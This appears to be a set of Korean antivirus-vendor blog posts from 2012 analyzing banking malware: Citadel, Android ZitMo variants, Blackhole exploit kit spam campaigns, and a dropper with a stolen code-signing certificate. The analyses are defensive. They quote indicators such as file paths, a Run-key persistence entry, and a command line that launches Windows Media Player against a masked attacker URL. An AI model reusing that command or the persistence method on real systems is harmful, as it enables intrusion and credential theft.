- 제우스, 스파이아이 이은 금융정보 탈취형 악성코드 Citadel 분석 발표 

- 강화된 정보 수집 기능으로 인터넷 뱅킹 정보 및 PC 정보 수집 

- 인터넷에서 유상 판매...악성코드의 기업화 양상 


세계적으로 큰 피해를 일으켰던 금융정보 탈취형 악성코드인 제우스[Zeus]와 스파이아이[Spyeye]의 뒤를 잇는 강력한 악성코드가 발견됐다.

 

글로벌 보안 기업 안랩[구 안철수연구소, 대표 김홍선, www.ahnlab.com]은 강력한 기능의 금융정보 탈취형 악성코드인 시타델[Citadel] 악성코드에 대한 분석 결과를 발표하고 사용자 주의를 당부했다.

 

시타델은 ‘시타델 빌더’라 불리는 악성코드 생성기로 만들어진 악성코드로, 과거 제우스 악성코드와 작동 방식이 유사하다. 현재 ‘제우스 빌더’가 더 이상 업데이트되지 않고 소스코드까지 공개된 시점에서 새롭게 대두되기 시작한 악성코드이다.

 

안랩의 분석에 따르면 시타델 악성코드의 기능은 전체적으로 제우스와 유사한 경향을 보인다. 따라서 악성코드에 감염된 PC의 네트워크인 봇넷[Botnet]을 구성하기 위한 기능을 기본으로, 사용자의 인터넷 뱅킹 정보, 웹 브라우저 내 저장 정보, SNS[소셜네트워크서비스] 개인정보 등 다양한 데이터를 탈취하는 기능을 가지고 있다. 또한 공격자용 서버인 C&C 서버로부터 허위백신[사용자의 PC를 사용하지 못하게 만들거나 허위로 악성코드에 감염되었다는 정보로 공포심을 유발한 후 이를 해결하기 위한 대가로 직접적인 송금을 강요하는 부류의 악성코드] 등을 추가적으로 내려 받아 감염된 PC 사용자에게 직접적으로 금전을 요구하기도 한다.

 

반면, 정보 탈취의 기능은 제우스에 비해 비약적으로 강화되었다. 제우스의 경우 뱅킹 인증 정보를 훔치기에 앞서 운영체제 정보, 웹 브라우저 정보, 사용자가 설정한 컴퓨터 이름 등 감염 PC의 기본 정보만 모아 공격자에게 전송한다. 반면 시타델은 기본적인 정보 외에 감염 PC가 소속된 네트워크 정보가 포함되어 APT[Advanced Persistent Threat]까지 고려한 정보수집을 시도한다. 예를 들어 로컬 네트워크의 도메인 정보, 데이터베이스 서버 리스트, 사용자 네트워크 환경을 수집하고 윈도우 사용자 및 그룹 계정 정보, 더 나아가 웹 브라우저에 홈페이지로 설정된 정보까지 수집한다.

 

시타델 악성코드는 ‘시타델 스토어’라는 곳에서 판매되고 있다. 악성코드를 생성하는 빌더와관리자용 패널을 판매하는 한편, 미리 구축된 봇넷에 대한 월별 사용료, 백신을 회피하기 위한 서비스 및 업데이트 사용료 등 세분화한 판매 정책으로 기업화 및 전문화한 최근 악성코드의 경향을 반영하고 있다.

 

안랩의 온라인 거래 보안 솔루션인 AOS[AhnLab Online Security]는 이러한 시타델, 스파이아이, 제우스와 같은 고도화한 타깃형 악성코드에 대응하기 위해 특화 설계된 보안 플랫폼이다. AOS는 시큐어 브라우저[AOS Secure Browser], 안티키로거[AOS Anti-keylogger], 방화벽[AOS Firewall], 백신[AOS Anti-virus/spyware]로 구성되어 악성코드 공격 및 키보드를 통한 정보 탈취, 허가되지 않은 외부 침입 방지 등 다양한 보안 위협을 막아낸다. 또한, 안랩은 AOS의 스마트폰용 버전인 ‘AOS 모바일’을 출시하고, 인텔의 개인정보보호 기술인 인텔 IPT[Intel® IPT]를 AOS에 적용해 더욱 강력해진 사용자 인증 기능을 제공한다. AOS는 현재 국내 다양한 금융사를 비롯해 남미의 배너멕스와 산탄데르, 북미 지역의 코너스톤뱅크 등 해외 금융권에도 적용되고 있다.

 

안랩 시큐리티대응센터 이호웅 센터장은 “이제 악성코드는 대부분 금전적인 목적으로 제작되고 있다고 해도 과언이 아니다. 특히 금융정보를 노린 타깃형 악성코드는 더욱 증가할 것으로 예상된다. 사용자는 PC 백신 업데이트, 수상한 메일의 첨부 파일 및 링크 클릭 자제 등 주의가 필요하고, 기업의 경우 자사 시스템과 고객을 동시에 보호할 수 있는 광범위한 보안 솔루션 도입이 필수적이다.”라고 말했다. 

 

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

금융 정보를 탈취를 목적으로하는 악성코드들은 PC와 안드로이드(Android)까지 다양한 운영체제와 디바이스들을 대상으로 그 범위를 확장해가고 있으며, 최근에는 안드로이드 모바일 운영체제를 대상으로 감염 후 개인 금융 정보 탈취를 목적으로하는 안드로이드 악성코드들이 지속적으로 발견되고 있다.


ASEC에서는 6월에도 이러한 형태의 안드로이드 악성코드인 ZitMo(Zeus in the Mobile)라는 안드로이드 악성코드가 발견되었음을 공개한 바가 있다.


2012년 6월 - Zitmo 변형으로 알려진 안드로이드 악성코드


현지 시각으로 2012년 8월 7일 해외 보안 업체인 캐스퍼스키(Kaspersky)에서는 블로그 "New ZitMo for Android and Blackberry"를 통해 새로운 ZitMo 안드로이드 악성코드 변형이 발견되었음을 공개하였다.


ASEC에서는 해당  새로운 ZitMo 안드로이드 악성코드 변형을 확보하여 자세한 분석을 진행하였다.


이 번에 발견된 ZitMo 안드로이드 악성코드 변형을 안드로이드 스마트폰에 설치하게 되면 아래 이미지와 같이 "SMS(Short Message Service) 송수신 권한"을 설치시 요구하게 된다.



그리고 설치가 완료되면 아래 이미지와 같이 "Zertifikat"라는 명칭을 가지는 아이콘을 안드로이드 스마트폰에 생성하게 된다. 해당 "Zertifikat"는 독일어로 증명서 또는 인증서를 의미한다.



해당 ZitMo 안드로이드 악성코드를 실행하게 되면 아래 이미지와 같은 독일어로 되어 있는 메시지가 나타나게 되며, 이는 "설치 성공, 정품 인증 코드는 7725486193 입니다."를 의미 한다.



설치가 완료되면 해당 ZitMo 안드로이드 악성코드는 안드로이드 스마트폰이 부팅하게 되면 자신의 아이콘을 숨기고, 감염된 안드로이드 스마트폰으로 송수신되는 모든 SMS들을 특정 휴대전화 번호로 전송하게 된다.


이러한 동작 기법으로 미루어 해당 ZitMo 안드로이드 악성코드는 유럽 지역에서 스마트폰을 이용한 뱅킹(Banking) 서비스 이용시에 사용자 인증을 위해 스마트폰과 휴대 전화로 뱅킹 인증 번호를 SMS로 전송한다는 점을 악용하여 감염된 안드로이드 폰에서 송수신한 뱅킹 인증 번호를 다른 휴대전화로 유출하는 것으로 분석 된다.


이번에 발견된 ZitMo 안드로이드 악성코드는 V3 모바일 제품군에서 다음과 같이 진단한다.


Android-Trojan/Zitmo.M


안드로이드 모바일 기기 사용자들은 인터넷 웹 사이트 등을 통해 안드로이드 앱들을 다운로드 받아 설치하는 것보다 신뢰 할 수 있는 통신사 또는 제조사가 제공하는 앱스토어를 이용해 다운로드 및 설치하는 것이 중요하다.


그리고 안드로이드 모바일 기기에서도 신뢰 할 수 있는 보안 업체가 개발한 보안 제품을 설치하여 주기적으로 검사하는 것이 필요하다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

최근 들어 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴킷이 스팸 메일(Spam Mail)과 결합되어 유포되는 현상들이 자주 발견되고 있다.


최근 발견된 블랙홀 웹 익스플로잇 툴킷과 스팸 메일이 결합되어 유포된 사례들은 다음을 들 수가 있다.


2012년 6월 - 스팸 메일과 결합된 웹 익스플로잇 툴킷


2012년 7월 - 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 인터넷을 이용한 현금 결제 서비스인 페이팔(PayPal)의 결제 결과 안내 메일로 위장하여 유포되었다.


이 번에 발견된 페이팔 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



페이팔 결제 안내 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 페이팔 웹 페이지로 연결되는 것이 아니라 미국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 미국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 다른 말레이시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 기존 블랙홀 익스플로잇 툴킷과 동일한 포맷의 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 말레이시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.


그리고 해당 블랙홀 익스플로잇 툴킷에서는 아래의 취약점들 중 하나를 악용하게 된다.



해당 취약점이 성공적으로 악용되면 동일한 시스템에 존재하는 64b3bcf.exe (84,480 바이트)를 다운로드하여 wpbt0.dll (84,480 바이트) 명칭으로 생성하게 된다.


C:\Documents and Settings\[사용자 계정]\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (84,480 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe   (84,480 바이트) 명칭으로 복사하게 된다.


C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 explorer.exe 정상 프로세스의 스레드로 자신의 코드를 삽입한 후 다음의 정보들을 후킹하게 된다.

웹 사이트 접속 정보
FTP 시스템 접속 사용자 계정과 비밀 번호 정보
POP3 이용 프로그램 사용자 계정과 비밀 번호 정보
웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보

마지막으로 감염된 PC 사용자에게는 구글 메인 웹 페이지로 연결하여 정상적인 접속이 실패한 것으로 위장하게 된다.

이 번에 발견된 페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.

JS/Iframe
JS/Redirect
PDF/Cve-2010-0188
Win-Trojan/Agent.84480.HA

페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.

이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Posted by 비회원

ASEC에서는 "2012 예상 스마트폰 보안 위협 트렌드"를 발표하며 윈도우 PC에서 감염 및 동작하는 제우스(Zeus) 악성코드의 모바일 버전인 Zitmo[Zeus In The Mobile]가 발견되었으며 심비안(Symbian), 블랙베리(Blackberry)를 거쳐 최근엔 안드로이드(Android) 플랫폼으로까지 확장되었다고 언급한 바가 있다.


금일 러시아 보안 업체 캐스퍼스키(Kaspersky)에서는 블로그 "Android Security Suite Premium = New ZitMo"를 통해 새로운 Zitmo 변형이 발견되었음을 공개하였다.


ASEC에서는 추가적인 조사를 통해 해당 새로운 Zitmo 변형은 구글(Google)의 공식 안드로이드 앱스토어(Appstore)를 통해 유포 된 것이 아니라, 인터넷에 존재하는 서드 파티 앱스토어(3rd Party Appstore)를 통해 유포된 것을 파악하였다.


이 번에 발견된 새로운 Zitmo 변형은 안드로이드 모바일 운영체제에서 감염 및 동작하도록 되어 있으며, 안드로이드 운영체제에 설치 되면 아래 이미지와 같이 허위 보안 소프트웨어로 위장하고 있다.



안드로이드에 감염되는 허위 보안 소프트웨어는 이 번에 처음 발견된 것이 아니며 2012년 5월 해외 보안 업체 아이콘으로 위장한 형태가 발견된 사례가 있다.


그리고 해당 안드로이드 악성코드는 설치 시에 아랭 이미지와 같이 감염된 안드로이드 모바일 기기에서 송수신하는 SMS 메시지 접근 권한과 SMS 발송 권한 등이 사용됨을 보여주고 있다.



해당 Zitmo 안드로이드 악성코드가 실행되면 아래와 같이 일반적인 허위 보안 소프트웨어에서 사용하였던 기법과 동일하게 인증 등록 번호를 입력하도록 요구한다.



그러나 해당 안드로이드 악성코드는 감염된 안드로이드 모바일 기기에서 다음 정보들을 수집하여 특정 C&C 서버로 전송하게 된다.


휴대폰 번호

SubscriberId

DeviceId

모델명

제작사

OS 버전

SMS 메시지


이 번에 발견된 새로운 Zitmo 변형들은 V3 모바일 제품군에서 다음과 같이 진단한다.


Android-Trojan/Zitmo

Android-Trojan/Zitmo.B

Android-Trojan/Zitmo.C

Android-Trojan/Zitmo.D


안드로이드 모바일 기기 사용자들은 인터넷 웹 사이트 등을 통해 안드로이드 앱들을 다운로드 받아 설치하는 것보다 신뢰 할 수 있는 통신사 또는 제조사가 제공하는 앱스토어를 이용해 다운로드 및 설치하는 것이 중요하다.

그리고 안드로이드 모바일 기기에서도 신뢰 할 수 있는 보안 업체가 개발한 보안 제품을 설치하여 주기적으로 검사하는 것이 필요하다.

저작자 표시
신고
Posted by 비회원
일반적으로 전자 서명은 특정 기업이나 단체에서 해당 파일은 자신들에 의해 개발 및 제작된 것이며 위, 변조가되지 않았다는 것을 증명하는 용도로 사용되고 있다.

이러한 전자 서명을 최근 몇 년 전부터 악성코드들은 보안 제품을 우회하기 위한 목적으로 전자 서명(Digital Signature)를 파일에 사용하기 시작하였다. 여기서 사용되는 전자 서명들 대부분이 특정 기업이나 단체로부터유출된 정상 전자 서명임으로 해당 정보를 이용해 정상 파일로 오판하도록 하고 있다.

이러한 악성코드의 전자 서명 악용 사례들로는 2011년 제우스(Zeus) 악성코드가 캐스퍼스키(Kaspersky)의 전자 서명을 도용한 사례2010년 7월 특정 포털에서 배포하는 정상 파일로 위장한사례가 존재한다.

이러한 전자 서명을 악용한 악성코드 유포 사례가 최근 캐스퍼스키 블로그 "Mediyes - the dropper with a valid signature"를 통해 공개 되었다.

해당 악성코드는 ASEC에서 확인한 아래 이미지와 같이 Conpavi AG 라는 스위스 업체의 전자 서명을 도용하고 있다. 


그리고 발급된 전자 서명은 아래 이미지와 같이 2011년 11월부터 2012년 11월까지 사용할 수 있도록 기한이 유효한 정상적인 전자 서명이었다.


이렇게 기업이나 단체의 전자 서명을 악성코드의 도용하는 사례들이 증가함에 따라 기업이나 단체에서는 전자 인증서 발급과 관련된 개인키(Private Key) 관리에 주의를 기울이고, 만약 유출된 사실이 확인된다면 전자 인증서를 폐기하고 새로 발급해야 전자 서명의 도용 사례를 막을 수가 잇다.

이번 스위스 기업의 전자 서명을 도용한 악성코드들은 V3 제품군에서 다음과 같이 진단한다.

Win-Trojan/Mediyes.628544 
Win-Trojan/Mediyes.436224
저작자 표시
신고
Posted by 비회원

- 앱, OS 취약점 노린 악성코드 대량 유포, 좀비폰 본격 등장 예상 
- 스마트폰 전용 백신, 공식 마켓 활용 등 사용자 주의 당부

글로벌 보안 기업인 안철수연구소[대표 김홍선, www.ahnlab.com, 약칭 ‘안랩’]는 5일 2011년에 발생했던 주요 스마트폰 악성코드 트렌드와 2012년에 예상되는 스마트폰 보안 위협을 발표했다.
 
이에 따르면 2011년의 주요 이슈는 ▶과금형 악성코드 폭발적 증가 ▶유명 어플리케이션으로 위장한 악성코드 ▶사생활 침해형 애플리케이션 증가 ▶ 온라인뱅킹정보 노리는 악성코드 발생 등을 꼽았다.
 
또한, 2012년 한 해 예상되는 주요 스마트폰 보안이슈는 ▶ 애플리케이션, OS 취약점 등을 이용한 악성코드 대량 유포 가능성 ▶커널을 공격하는 루트킷 기능의 발전 ▶ 좀비폰 및 봇넷 본격적 활성화 ▶국내를 겨냥하는 모바일 악성코드 등장 등이다.
 
2012년 예상 스마트폰 보안 위협
 
1] 애플리케이션, 운영체제 취약점 등을 이용한 악성코드 대량 유포 가능성
 
현재 윈도우 PC 기반 악성코드 배포 방식 중 가장 유행하는 것은, 웹사이트 변조를 통해 악성코드를 심어 관련 취약점이 패치 되지않은 다수의 사용자에게 악성코드를 유포하는 것이다. 이와 동일하게 스마트폰 사용자가 증가하고, 자연스럽게 이를 통해 인터넷 웹페이지를 보는 경우가 증가함에 따라 해커의 타깃이 될 가능성이 높다. 모바일 환경에서도 PC와 마찬가지로 모바일용 웹어플리케이션의 취약점을 이용해 다수의 사용자에게 한꺼번에 악성코드를 유포한다면 매우 위험해질 수 있다. 소셜네트워크서비스[SNS], 이메일 애플리케이션 등도 취약점이 발견된다면 역시 악용될 수 있다.
 
2] 스마트폰 커널을 공격하는 루트킷 기능의 발전
 
안드로이드의 루팅[rooting]이나, 아이폰의 해킹[hacking]은 애플리케이션의 취약점을 이용하는 것이다. 운영체계의 가장 중요한 핵심인 ‘커널’의 모든 것을 조작할 수 있는 일명 슈퍼유저[super user]의 권한을 취득하게 해준다. 수퍼유저 권한 획득은 일반적 사용자에게 스마트폰의 기능 중 다양한 이유로 제한된 부분을 임의로 조작할 수 있게 해준다. 반면, 악의적인 사용자나 어플리케이션이 이 방법을 악용한다면 치명적일 수 있다. 예를 들어, 시스템 자체를 삭제해서 스마트폰을 영원히 쓸 수 없게 만든다거나, 절대 삭제할 수 없는 악성 애플리케이션을 몰래 실행시킨다거나 하는 것이다. 모바일 악성코드가 증가할수록 이와 같은 스마트폰의 커널을 공격하는 발전된 기술이 유포될 가능성이 높다.
 
3] 좀비 스마트폰 본격적 활성화
 
스마트폰에 악성코드를 대량으로 유포하는 방식이 발전한다면, 좀비PC와 마찬가지로 ‘좀비스마트폰’이 활성화할 가능성이 높다. 7.7 이나 3.4 디도스 공격과 같은 사태가 스마트폰 감염으로 발생하지 않으리라는 보장은 없는 것이다. 올해 안드로이드 플랫폼에서도 스마트폰을 좀비화시키는 봇[bot]에 감염된 ‘좀비 스마트폰’의 네트워크인 ‘봇넷[botnet]을 구성하려는 시도를 보인 악성코드가 중국의 써드파티 마켓에서 발견되었지만, 제한적인 마켓에서만 유포됐기 때문에 피해는 크지 않았다. [http://asec.ahnlab.com/299 참고]
 
4] 국내를 겨냥하는 스마트폰 악성코드 등장
 
2011년에는 다양한 스마트폰 악성코드가 발생한 한 해였지만, 대부분의 악성코드가 유럽, 러시아, 중국 지역을 겨냥하여 만들어져 국내에서의 모바일 악성코드 피해는 크지 않았다. 그러나 한국의 스마트폰 사용률이 매우 높은 편이라는 것을 고려할 때, 악성코드 제작자의 주목을 받을 소지가 다분하다. 국내의 스파이웨어 방지법을 교묘히 피해 제작되는 애드웨어성 악성코드나, 각종 온라인게임계정 또는 민감한 개인정보를 탈취하는 류의 악성코드가 국내의 모바일 환경에 맞게 새롭게 등장할 수 있다.
 
2011년 주요 스마트폰 악성코드 트렌드

1] 과금형 악성코드 폭발적 증가

2011년을 대표하는 안드로이드 악성코드로는 과금형 악성코드를 꼽을 수 있다. 과금형 악성코드는 안드로이드 플랫폼이 전화나 문자기능이 포함된 스마트폰 운영체제[OS]라는 점을 악용한 예이다. 대부분 문자 과금 방식[premium call, 송신자에게 추가요금이 발생하는 번호 서비스]을 주로 이용한다. 즉, 악성코드 감염 시 추가 과금을 발생시키는 특정 번호로 사용자 몰래 문자를 보내 피해자에겐 금전적 피해를 주는 동시에 공격자에겐 직접 수익을 발생시킨다. 가장 최근에 발견된 과금 악성코드는 Android-Trojan/Pavelsms [http://asec.ahnlab.com/751 참고]로, 해외에선 ‘ruFraud’라는 이름으로 알려져 있다. 이 악성코드는 감염 시 스마트폰의 가입국가를 파악하고 유럽 내 스마트폰일 경우 각 국가에 맞는 프리미엄 문자를 보내는 것이 특징이다.
 
2] 유명 어플리케이션으로 가장한 위장형 악성코드
 
구글서치[Google Search], 구글플러스[Google+], 앵그리버드[Angry bird], 오페라[Opera], 스카이프[Skype] 등 사용자층이 많은 유명 어플리케이션으로 위장해 악성코드를 배포한 사례도 있다. 이런 위장형 악성코드는 주로 정식마켓이 아닌 사설마켓[써드파티마켓]을 통해 배포되었다. 또한 실제 정상 애플리케이션과 아이콘, 애플리케이션 이름이 완전히 동일하여 사용자가 쉽게 구분하기 어렵다. 다른 위장형 악성코드로는 정상 어플리케이션과 완전히 동일하게 동작하게끔 하면서 추가적으로 악성코드를 삽입하여 재배포 시키는 리패키징[repackaging]형 악성코드가 있다. [http://asec.ahnlab.com/258 참고]
 
3] 사생활 침해 형 어플리케이션 증가
 
스마트폰은 통화 및 문자 송수신, 카메라, GPS 기능 등으로 인해 PC보다 좀더 생활에 밀착된 민감한 정보들을 가지고 있다. 이러한 정보들이 유출될 시에는 심각한 사생활 침해가 된다. 예를 들어 진단명 ‘Android-Spyware/Nicky’와 같은 악성코드는 GPS를 통해 수집된 사용자 위치정보, 문자 송수신, 전화 송수신 내역뿐만 아니라 음성녹음 기능을 악용해 사용자의 통화내용까지도 훔쳐가는 기능을 내장하고 있어서 큰 충격을 주었다. [http://asec.ahnlab.com/320, http://core.ahnlab.com/290 참고] 2011년뿐 아니라 앞으로도 이러한 디지털 스토커[digital stalker]형 악성코드가 지속적으로 증가할 전망이다.
 
4] 온라인뱅킹정보 노리는 악성코드 발생
 
온라인뱅킹 정보를 갈취하는 것으로 유명한 Zeus 악성코드가 다양한 모바일 환경에서도 동작하도록 제작되어 유포된 것이 발견되었다. Zitmo[Zeus In The Mobile] 로 불리는 이 악성코드는 심비안, 블랙베리를 거쳐 최근엔 안드로이드 플랫폼까지 진화했다. 안드로이드의 Zitmo 악성코드는 해외의 뱅킹 보안 업체의 제품을 위장해 실행되었다. 온라인 뱅킹에 접속할 때 일회용 비밀번호[OPT]와 문자인증 등 두 가지의 인증요소로 본인임을 확인하는 이중인증[two-factor] 방식을 깨기 위해 문자 수신내역까지 감청하는 등의 치밀함을 보여준 것이 특징이다.
 
안철수연구소 시큐리티대응센터 이호웅 센터장은 "아직 국내에는 구체적 피해가 발생하지 않았지만 스마트폰 악성코드는 안드로이드를 중심으로 폭발적으로 증가하고 있다. 이는 스마트폰의 확산, 공격자의 직접수익 경로 확보 등의 이유로 2012년에도 증가세가 이어질 것으로 예상된다”라며, “사용자는 스마트폰 루팅이나 탈옥, 사설 마켓 이용 등을 자제하고, 애플리케이션을 다운받을 때 평판정보 확인, V3 모바일과 같은 스마트폰 전용 백신의 설치 및 최신 버전 유지 등의 주의를 기울이는 것이 좋다” 고 강조했다.
저작자 표시
신고
Posted by 비회원